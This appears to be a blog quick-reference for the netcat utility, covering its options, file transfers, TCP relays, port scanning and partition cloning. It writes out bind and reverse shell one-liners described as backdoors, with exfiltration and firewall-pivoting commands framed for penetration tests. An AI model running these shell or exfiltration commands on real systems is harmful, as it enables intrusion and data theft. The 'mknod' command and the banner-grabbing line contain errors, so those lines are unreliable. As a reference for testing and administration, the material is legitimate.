Netcat Quick Reference & Examples

This article gives a brief overview for the basics of using the netcat utility. I’ve written this for my own quick reference purposes, but hopefully will be useful to others.

The syntax below relates to the original ‘Hobbit’ netcat program. Examples will need to be adapted for use with GNU Netcat, socat or NMap’s ncat.

Basic Operation

Netcat can operate in client or server mode. By default all network IO is passed via stdin/stdout.

  • nc [target] [port] - Client operation; connect to target host on port.
  • nc -l -p [port] - Server operation; start a listener on local port.

Commandline Options

The netcat command line usage format is as follows:

$ nc [options] [target] [port(s)]

The target parameter is the remote system’s IP address or hostname. In client mode this is the target system to connect to and is optional in server mode.

-l - Listen (server) mode; default is client mode.
-L - Listen persistently (continue after first client disconnects); Windows only.
-l -k - Listen persistently option for Linux.
-p - Local port number to use (source port in client mode).
-u - Operate in UDP mode (default is TCP).
-n - Don’t perform DNS lookups.
-wN - Timeout in N seconds for client or server mode before exiting.
-v - Prints verbose status info to stderr.
-vv - Prints extra verbose info to stderr.
-e cmd - Execute cmd and pipe netcat IO to program via stdin/stdout.
-z - When in client mode, emit packets with no payload.

File Transfers with Netcat

It is possible to transfer files between systems using netcat. This is particularly useful in barebones environments where there is no FTP/NFS/CIFS/etc. available. It is also a typical way of exfiltrating data during a penetration test or CTF challenge.

Pull File from Remote Listener

On the remote system a listener should be running with the following command:

nc -l -p [port] < examplefile.bz2

On the local system, download the file with a netcat client using the following command:

nc -w4 [remotehost] [port] > receivedfile.bz2

Push File to Remote Listener

On the remote system a listener should be running with the following command:

nc -l -p [port] > receivedfile.bz2

On the local system, upload the file with a netcat client using the following command:

nc -w4 [remotehost] [port] < examplefile.bz2

TCP Tunnels with Netcat (Linux)

Netcat can be used to forward TCP traffic between two other remote systems. This is generally used to circumvent firewalls and ‘pivot’ during penetration tests.

The process involves creating a FIFO buffer (named pipe) and relaying data between two netcat instances. Create a named pipe with the following command:

mknod backpipe /tmp/ncpipe

Create a netcat relay which forwards packets received on the local port [lport] to a netcat client connected to [target] on [port]:

nc -l -p [lport] 0<backpipe | nc [target] [port] | tee backpipe

For example to relay Telnet connections received on port 9999 to towel.blinkenlights.nl:

nc -l -p 9999 0<backpipe | nc towel.blinkenlights.nl 23 | tee backpipe

Any locally received connections on port 9999 would now be relayed to the towel host.

TCP Tunnels with Netcat (Windows)

Achieving the same result as illustrated above requires a different command syntax on Windows:

echo nc [target] [port] > relay.bat
nc -l -p [lport] -e relay.bat

Remote Shells with Netcat

Netcat is a popular way to create a remotely accessible shell on a system (or, backdoor).

nc -l -p [port] -e /bin/bash - Creates a Linux Bash shell listening on port.

nc -l -p [port] -e cmd.exe - Creates a Windows command shell listening on port.

Reverse shells can also be created:

nc [remotehost] [port] -e /bin/bash - Connect local Linux Bash Shell to netcat listener on remotehost.

nc [remotehost] [port] -e cmd.exe - Connect local Windows command shell to netcat listener on remotehost.

Port Scanning with Netcat

A simple port scanner can be implemented with the following netcat command line syntax:

nc -v -n -z -w1 -r [target] 1-65535

This will connect to the specified port range on target, allowing a timeout of 1 second per port with randomised destination port ordering.

Use -vv on Windows for the same effect. Use -p to specify a local source port for netcat to use.

In a similar approach to the above port scanner, a service banner grabber can be implemented with the following command line syntax:

echo "" | nc -v -n -w1 =r [target] 1-65535.

Use -vv on Windows for the same effect. Use -p to specify a local source port for netcat to use.

Makeshift Webserver with Netcat

Notably useful in emergency maintenance scenarios, netcat can be jury-rigged to act as a simple web server:

while true; do nc -l -p 80 -q 1 < maintenance.html; done

Remote Partition Cloning with Netcat

As an extension to the above file transfer examples, it’s possible to remotely duplicate an offline partition using netcat. On the system containing the partition to be duplicated, run the following command to start a netcat client:

dd if=/dev/sdc | nc [target] [port]

On the receiving system, create a netcat listener to receive the partition file on port:

nc -l -p [port] | dd of=/tmp/sdc.img

The received dd image file can then be mounted or written to a physical disk.

Additional Information

Did you like this article? Please consider supporting this site.

Page last updated: